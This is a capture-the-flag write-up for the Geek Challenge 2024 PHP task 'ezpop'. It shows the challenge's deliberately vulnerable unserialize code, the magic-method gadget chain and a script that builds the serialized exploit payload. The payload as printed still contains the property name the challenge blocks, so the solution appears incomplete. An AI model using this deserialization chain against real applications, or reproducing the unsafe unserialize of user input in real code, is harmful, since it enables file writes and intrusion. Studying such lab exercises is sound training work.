2024极客大挑战

web

ezpop

 <?php
Class SYC{
    public $starven;
    public function __call($name, $arguments){
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){
            die('no hack');
        }
        file_put_contents($this->starven,"<?php exit();".$this->starven);
    }
}

Class lover{
    public $J1rry;
    public $meimeng;
    public function __destruct(){
        if(isset($this->J1rry)&&file_get_contents($this->J1rry)=='Welcome GeekChallenge 2024'){
            echo "success";
            $this->meimeng->source;
        }
    }

    public function __invoke()
    {
        echo $this->meimeng;
    }

}

Class Geek{
    public $GSBP;
    public function __get($name){
        $Challenge = $this->GSBP;
        return $Challenge();
    }

    public function __toString(){
        $this->GSBP->Getflag();
        return "Just do it";
    }

}

if($_GET['data']){
    if(preg_match("/meimeng/i",$_GET['data'])){
        die("no hack");
    }
   unserialize($_GET['data']);
}else{
   highlight_file(__FILE__);
}

lover::__destruct() -> Geek::__get() -> lover::__invoke() -> Geek::__toString() -> SYC::__call

Pop:

<?php
error_reporting(0);
Class SYC{
    public $starven;
}

Class lover{
    public $J1rry = "data://text/plain,Welcome GeekChallenge 2024";
    public $meimeng;

}

Class Geek{
    public $GSBP;

}

$a = new lover();
$a->meimeng = new Geek();
$a->meimeng->GSBP = new lover();
$a->meimeng->GSBP->meimeng = new Geek();
$a->meimeng->GSBP->meimeng->GSBP = new SYC();
$a->meimeng->GSBP->meimeng->GSBP->starven = "flag.php";
echo urlencode(serialize($a));